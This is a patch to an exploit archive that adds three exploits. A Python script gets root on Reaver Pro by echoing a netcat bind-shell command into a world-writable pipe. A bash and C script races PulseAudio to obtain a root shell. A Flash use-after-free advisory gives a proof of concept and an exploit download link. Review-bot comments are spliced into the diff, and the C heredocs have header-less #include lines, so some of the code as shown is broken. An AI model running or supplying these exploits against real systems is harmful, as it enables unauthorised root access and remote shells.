From 26ae373579f457d8d180114e44f6373fefec2026 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 30 Mar 2016 05:03:47 +0000
Subject: [PATCH] DB: 2016-03-30 3 new exploits

Adobe Flash - Object.unwatch Use-After-Free Exploit
---
 files.csv | 1 +
 platforms/linux/local/37898.py | 23 ++++
 platforms/linux/local/9207.sh | 183 ++++++++++++++++++++++++++++
 platforms/multiple/remote/39631.txt | 28 +++++
 4 files changed, 235 insertions(+)
 create mode 100755 platforms/linux/local/37898.py
 create mode 100755 platforms/linux/local/9207.sh
 create mode 100755 platforms/multiple/remote/39631.txt

diff --git a/files.csv b/files.csv
index 834f67c62..6c64f675b 100755
--- a/files.csv
+++ b/files.csv
@@ -35855,3 +35855,4 @@ id,file,description,date,author,platform,type,port
 39628,platforms/linux/local/39628.txt,"FireEye - Privilege Escalation to root from Malware Input Processor (uid=mip)",2016-03-28,"Google Security Research",linux,local,0
 39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0
 39630,platforms/windows/local/39630.g,"Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0
+39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0
diff --git a/platforms/linux/local/37898.py b/platforms/linux/local/37898.py
new file mode 100755
index 000000000..4c1797a70
--- /dev/null
+++ b/platforms/linux/local/37898.py
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/55725/info
+
+Reaver Pro is prone to a local privilege-escalation vulnerability.
+
+A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers.
+
+#!/usr/bin/env python
+import os
+print """
+ Reaver Pro Local Root
+ Exploits a hilarious named pipe flaw.
+The named pipe /tmp/exe is open to anyone...
+Any command echoed into it gets ran as root.
+This simply launches a bindshell on 4444...
+ Insecurety Research | insecurety.net
+"""
+print ""
+print "This is why TacNetSol should hire me?"
+print "[+] Sending command to named pipe..."
+cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
+os.system(cmd)
+print "[+] Connecting to bind shell, enjoy root!"
+os.system("nc -v localhost 4444")
diff --git a/platforms/linux/local/9207.sh b/platforms/linux/local/9207.sh
new file mode 100755
index 000000000..31847aec0
--- /dev/null
+++ b/platforms/linux/local/9207.sh
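Review bot: The advisory header on the first five lines of 37898.py records only the securityfocus URL; it gives no affected Reaver Pro version, vendor fix status or disclosure date, so a reader triaging the entry cannot tell which releases the named-pipe description applies to. Suggest a line after the source URL such as `Affected: Reaver Pro <VERSION-PLACEHOLDER>; fix status: <UNKNOWN-PLACEHOLDER>; ref BID 55725`, with the values taken from the referenced record. The commit subject says three new exploits, but the files.csv hunk adds an index row only for 39631; 37898 and 9207 get no row here, which may be intentional if they were indexed in an earlier commit, but is worth confirming so the archive index stays consistent with the files present.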
@@ -0,0 +1,183 @@
+#!/bin/bash
+
+pulseaudio=`which pulseaudio`
+workdir="/tmp"
+#workdir=$HOME
+id=`which id`
+shell=`which sh`
+
+trap cleanup INT
+
+function cleanup()
+{
+ rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
+ rm -rf $workdir/PATMP*
+}
+
+cat > $workdir/pa_race.c << __EOF__
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define PULSEAUDIO_PATH "$pulseaudio"
+#define SH_PATH "$workdir/sh"
+#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"
+
+void _pause(long sec, long usec);
+
+int main(int argc, char *argv[], char *envp[])
+{
+ int status;
+ pid_t pid;
+ char template[sizeof(TMPDIR_TEMPLATE)];
+ char *tmpdir;
+ char hardlink[sizeof(template) + 2];
+ char hardlink2[sizeof(template) + 12];
+
+ srand(time(NULL));
+
+ for( ; ; )
+ {
+ snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
+ template[sizeof(template) - 1] = '\0';
+
+ tmpdir = mkdtemp(template);
+ if(tmpdir == NULL)
+ {
+ perror("mkdtemp");
+ return 1;
+ }
+
+ snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
+ hardlink[sizeof(hardlink) - 1] = '\0';
+
+ snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
+ hardlink2[sizeof(hardlink2) - 1] = '\0';
+
+ /* this fails if $workdir is a different partition */
+ if(link(PULSEAUDIO_PATH, hardlink) == -1)
+ {
+ perror("link");
+ return 1;
+ }
+
+ if(link(SH_PATH, hardlink2) == -1)
+ {
+ perror("link");
+ return 1;
+ }
+
+ pid = fork();
+
+ if(pid == 0)
+ {
+ char *argv[] = {hardlink, NULL};
+ char *envp[] = {NULL};
+
+ execve(hardlink, argv, envp);
+
+ perror("execve");
+ return 1;
+ }
+
+ if(pid == -1)
+ {
+ perror("fork");
+ return 1;
+ }
+ else
+ {
+ /* tweak this if exploit does not work */
+ _pause(0, rand() % 500);
+
+ if(unlink(hardlink) == -1)
+ {
+ perror("unlink");
+ return 1;
+ }
+
+ if(link(SH_PATH, hardlink) == -1)
+ {
+ perror("link");
+ return 1;
+ }
+ waitpid(pid, &status, 0);
+ }
+
+ if(unlink(hardlink) == -1)
+ {
+ perror("unlink");
+ return 1;
+ }
+
+ if(unlink(hardlink2) == -1)
+ {
+ perror("unlink");
+ return 1;
+ }
+
+ if(rmdir(tmpdir) == -1)
+ {
+ perror("rmdir");
+ return 1;
+ }
+ }
+
+ return 0;
+}
+
+void _pause(long sec, long usec)
+{
+ struct timeval timeout;
+
+ timeout.tv_sec = sec;
+ timeout.tv_usec = usec;
+
+ if(select(0, NULL, NULL, NULL, &timeout) == -1)
+ {
+ perror("select");
+ }
+}
+__EOF__
+
+cat > $workdir/sh.c << __EOF__
+#include
+#include
+#include
+#include
+
+
+int main(int argc, char *argv[], char *envp[])
+{
+ if(geteuid() != 0)
+ {
+ return 1;
+ }
+
+ setuid(0);
+ setgid(0);
+
+ if(fork() == 0)
+ {
+ argv[0] = "$id";
+ argv[1] = NULL;
+ execve(argv[0], argv, envp);
+ return 1;
+ }
+
+ argv[0] = "$shell";
+ argv[1] = NULL;
+ execve(argv[0], argv, envp);
+ return 1;
+}
+__EOF__
+
+gcc -o $workdir/pa_race $workdir/pa_race.c
+gcc -o $workdir/sh $workdir/sh.c
+
+$workdir/pa_race
+
+# milw0rm.com [2009-07-20]
diff --git a/platforms/multiple/remote/39631.txt b/platforms/multiple/remote/39631.txt
new file mode 100755
index 000000000..17ce578ad
--- /dev/null
+++ b/platforms/multiple/remote/39631.txt
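Review bot: `_pause` in the pa_race.c heredoc is declared and defined at file scope with a leading underscore, a name form C reserves for the implementation; a plain identifier such as `static void race_delay(long sec, long usec)` avoids a potential clash with libc names. The three `…[sizeof(…) - 1] = '\0';` assignments that follow each `snprintf` are redundant, because `snprintf` always NUL-terminates when the buffer size is non-zero, and can be dropped. The `#include` directives in both heredocs carry no header name in this rendering; if that is how the file is stored, the two `gcc` invocations near the end cannot compile it, though this may be loss from the page extraction rather than from the commit itself. The hunk runs from the shebang to the trailing milw0rm comment, so the whole script is visible.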
@@ -0,0 +1,28 @@
+Sources:
+https://bugs.chromium.org/p/project-zero/issues/detail?id=716
+https://googleprojectzero.blogspot.ca/2016/03/life-after-isolated-heap.html
+
+The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes.
+
+ This issue is fairly easy to reproduce, a proof-of-concept for this issue in its entirety is:
+
+ var o = {};
+ o.unwatch();
+
+ The bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is:
+
+ void* args = alloca( args_size );
+ for( int i = 0; i < args_size; i++){
+ // Init args
+ }
+
+ if ( ((int) args[0]) & 6 == 6 )
+ args[0] = call_toString( args[0] );
+
+ if ( args_size < 1)
+ exit();
+
+
+Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39631.zip
+